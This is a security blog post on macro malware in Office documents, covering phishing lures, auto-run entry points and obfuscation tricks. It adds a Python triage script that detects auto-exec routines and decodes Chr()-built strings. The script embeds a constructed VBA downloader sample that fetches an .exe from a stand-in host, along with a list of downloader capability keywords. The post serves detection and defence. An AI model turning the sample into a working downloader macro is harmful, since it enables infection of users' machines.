This blog post was written by Vincent Weafer.
“Warning: This document contains macros.” A familiar message from the 1990s is back, as attackers find new ways to get people to open documents that carry macro malware. This updated threat is aimed at users in large organizations that rely on macros in their day-to-day work. Carefully crafted, socially engineered emails entice users to open seemingly legitimate documents and then to enable the macro. According to the latest McAfee Labs Threats Report, incidents of malicious macros have increased by a factor of four in the last year.
The most popular macro malware targets are Microsoft Office documents, especially Word files. Word allows macros to run automatically in response to document events, for example when a user opens a document (AutoOpen or Document_Open), closes it (AutoClose or Document_Close), or creates a new one (AutoNew or Document_New). These automatic entry points are used by both legitimate and malicious macros, which is why their presence alone is not proof of malice, but it is the first thing an analyst looks for.
The path to a broad-based system infection through macro malware typically starts with an email attachment made to appear like something legitimate, often socially engineered to fit the targeted user. Common subject lines include phrases such as payment request, courier notification, resume, sales invoice, and donation confirmation. The text of the email matches the subject line with enough information to get the attachment opened, including official-looking signatures and logos.
Once the attachment is opened, Microsoft Office warns the user that the file contains macros and asks whether to enable them. Some of these files display large text proclaiming that the document is “protected” and that macros must be enabled to view it. If the user clicks “Enable Content,” the malicious macro executes and drops a small downloader onto the system; the downloader fetches the real malware payload and then frequently deletes itself to remove the evidence. The malicious code can also be embedded in the document as an active (OLE) object, which likewise generates a warning when clicked, but many users are unfamiliar with the risk such embedded objects pose.
One of the biggest changes to macro malware since the last big infestation is its ability to hide, making it much more difficult to detect. Macro malware authors have adopted several techniques from other types of malware, including adding junk code and assembling strings at run time. Junk code is exactly that: code that is never intended to execute (unused variables, dead branches, meaningless arithmetic) but that is cheap to generate and easy to change, so it defeats signature-based detection and slows down threat researchers. More sophisticated is the use of multiple simple functions, such as character conversion, to hide the malicious URL: instead of appearing as a readable string, the address is built piece by piece from individual character codes and concatenation, so neither an email gateway nor a keyword scanner that looks for “http://” in the macro text will see it.
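The two analyst checks implied above, finding the automatic entry points and rebuilding strings that a macro assembles from Chr() calls, are straightforward to automate. The following Python script is an added example written for this post; it is not code from the original article or from McAfee Labs. The VBA it analyses is a constructed sample that imitates the described tricks (an AutoOpen entry point, junk statements, and a download URL split into Chr() calls across continued lines), and the keyword list is an illustrative selection of the COM objects and functions a downloader macro typically needs, not an exhaustive one.

```python
import re

# Constructed sample, written for this example to mirror the tricks the post
# describes (an auto-run entry point, junk code, a URL assembled from Chr()
# calls across continued lines). It is not a real sample.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim zq As Integer
    zq = 4 + 9                      ' junk: padding for signature evasion
    If zq = 99 Then MsgBox "never"  ' junk: condition is never true
    Call Stage2
End Sub

Sub Stage2()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & _
        Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & _
        Chr(46) & Chr(116) & Chr(101) & Chr(115) & Chr(116) & Chr(47) & _
        Chr(112) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    Dim o As Object
    Set o = CreateObject("MSXML2.XMLHTTP")
    o.Open "GET", u, False
End Sub
'''

# Word/Excel procedure names that run as soon as macros are enabled and the
# document is opened, closed or created, with no further user action.
AUTOEXEC_RE = re.compile(
    r'\b(?:Sub|Function)\s+(AutoOpen|AutoClose|AutoNew|AutoExec|AutoExit|'
    r'Document_Open|Document_Close|Document_New|Workbook_Open|Auto_Open)\b',
    re.IGNORECASE)

# Illustrative (not exhaustive) capabilities a downloader needs: create COM
# objects, fetch over HTTP, write a file, run it, and delete itself afterwards.
SUSPICIOUS_KEYWORDS = [
    "CreateObject", "MSXML2.XMLHTTP", "ADODB.Stream", "URLDownloadToFile",
    "WScript.Shell", "Shell", "SaveToFile", "Environ", "Kill",
]

# One token of a concatenation chain: Chr(n), ChrW(n), Chr$(n) or a "literal".
_TOKEN = r'Chr[W$]?\(\d+\)|"(?:[^"]|"")*"'
CHAIN_RE = re.compile(r'(?:%s)(?:\s*[&+]\s*(?:%s))+' % (_TOKEN, _TOKEN), re.IGNORECASE)
TOKEN_RE = re.compile(r'Chr[W$]?\((\d+)\)|"((?:[^"]|"")*)"', re.IGNORECASE)
URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)


def join_continuations(vba):
    """Fold VBA ' _' line continuations so a chain split over lines is one line."""
    return re.sub(r'\s_\r?\n\s*', ' ', vba)


def find_autoexec(vba):
    """Names of automatic entry points declared in the macro source."""
    return [m.group(1) for m in AUTOEXEC_RE.finditer(vba)]


def decode_chains(vba):
    """Rebuild every string the macro assembles from Chr() calls and literals."""
    decoded = []
    for chain in CHAIN_RE.finditer(join_continuations(vba)):
        parts = []
        for tok in TOKEN_RE.finditer(chain.group(0)):
            if tok.group(1) is not None:
                parts.append(chr(int(tok.group(1))))       # Chr(n) -> character
            else:
                parts.append(tok.group(2).replace('""', '"'))  # VBA doubles quotes
        decoded.append(''.join(parts))
    return decoded


def find_suspicious(vba, decoded):
    """Keyword hits in the source and in the reconstructed strings, since names
    such as WScript.Shell are often hidden behind Chr() as well."""
    haystack = join_continuations(vba) + '\n' + '\n'.join(decoded)
    return [k for k in SUSPICIOUS_KEYWORDS
            if re.search(r'\b' + re.escape(k) + r'\b', haystack, re.IGNORECASE)]


def triage(vba):
    """Static triage report: entry points, rebuilt strings, URLs, capabilities."""
    decoded = decode_chains(vba)
    urls = []
    for s in decoded:
        for u in URL_RE.findall(s):
            if u not in urls:
                urls.append(u)
    return {
        "autoexec": find_autoexec(vba),
        "decoded_strings": decoded,
        "urls": urls,
        "suspicious": find_suspicious(vba, decoded),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print("%-16s %s" % (key + ":", value))
```

Note what the script does not try to do: it makes no attempt to recognise junk code. Junk code is designed to vary, so keying detection off it would be chasing the attacker; instead the triage keys off things the macro cannot do without, an automatic entry point plus the objects needed to download and execute, and reconstructs the strings that concatenation was meant to hide. Real-world analysis would first extract the VBA source from the document (for example with a tool such as olevba) and feed it to logic like this.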
The simplicity and ease of coding macros make them accessible to a wide range of criminals with minimal technical skills. Given the potential reach and effectiveness of macro malware, businesses should re-educate users about this threat, in particular that a document demanding “Enable Content” before it can be read is a red flag. Furthermore, the operating system and applications should be kept up to date, and macro security settings in all Microsoft Office products should be set so that macros are disabled by default (in the Trust Center, “Disable all macros with notification” at minimum, or “Disable all except digitally signed macros” where feasible). Email clients should not open attachments automatically. Email gateways and virus scanners should also be configured to scan for, and filter, email attachments that contain macros.